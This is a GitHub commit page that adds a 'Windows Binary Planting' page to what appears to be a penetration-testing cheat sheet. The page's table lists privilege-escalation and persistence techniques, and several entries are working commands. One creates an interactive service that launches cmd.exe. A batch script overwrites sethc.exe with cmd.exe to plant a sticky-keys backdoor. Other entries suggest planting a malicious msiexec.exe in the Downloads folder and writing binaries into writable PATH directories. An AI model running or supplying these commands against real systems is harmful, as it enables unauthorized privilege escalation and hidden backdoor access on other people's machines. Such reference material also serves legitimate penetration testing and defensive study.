Skip to content

Commit 5348f45

Browse files
WebBreacherWebBreacher
committed
Added content for Binary Planting from Doku
1 parent 22f1032 commit 5348f45

File tree

2 files changed

+12
-0
lines changed

2 files changed

+12
-0
lines changed

navigation.md

+1
Original file line numberDiff line numberDiff line change
@@ -5,6 +5,7 @@
55
[Windows]()
66

77
* [Autostart Locations](windows/autostart.md)
8+
* [Binary Planting](windows/binary.md)
89
* [CMD Commands](windows/cmd.md)
910
* [Files - Blind](windows/blind.md)
1011
* [Files - Finding](windows/find_files.md)

windows/binary.md

+11
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
# Windows Binary Planting
2+
3+
Binary Planting is essentially putting binary is a specific place, be it moved, copied or uploaded to create the desired effect. In this section we'll be going over the use of binary planting to escalate privileges.
4+
5+
| Command | Description / Importance |
6+
| ------- | ------------------------ |
7+
| `%SystemRoot%\System32\wbem\mof\` | Taken from Stuxnet: http://blogs.iss.net/archive/papers/ibm-xforce-an-inside-look-at-stuxnet.pdf Look for Print spooler vulnerability. |
8+
| `echo $PATH` | Check the $PATH environmental variable. Some directories may be writable. See: https://www.htbridge.com/advisory/HTB23108 |
9+
| `msiexec.exe` | Idea taken from here: http://goo.gl/E3LTa - basically put evil binary named msiexec.exe in Downloads directory and when a installer calles msiexec without specifying path you get code execution. |
10+
| `sc create cmdsys type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start cmdsys` | Create malicious services. |
11+
|<code>Replacing file as: sethc.exe<br>@echo off <br>c: > nul\\cd\ > nul\\cd %SYSTEMROOT%\System32\ > nul <br>if exist %SYSTEMROOT%\System32\cmdsys\ rd /q %SYSTEMROOT%\System32\cmdsys\ > nul <br>cmd %SYSTEMROOT%\System32\cmdsys\ > nul <br>copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\cmd.bkp /y > nul <br>copy /y c:\windows\system32\sethc.exe c:\windows\system32\cmdsys\sethc.bkp /y > nul <br>copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\sethc.exe /y > nul <br>copy /y c:\windows\system32\cmdsys\sethc.exe c:\windows\system32\sethc.exe /y > nul<br>exit</code> | By doing this, you just have to press the sticky key activation key. From Wikipedia.org: To enable this shortcut, the ?Shift key must be pressed 5 times in short succession. This feature can also be turned on and off via the Accessibility icon in the Windows Control Panel. To turn off once enabled, just simply press 3 or more of the Sticky Keys (Ctrl, Alt, Shift, Windows Button) at the same time. |

0 commit comments

Comments
 (0)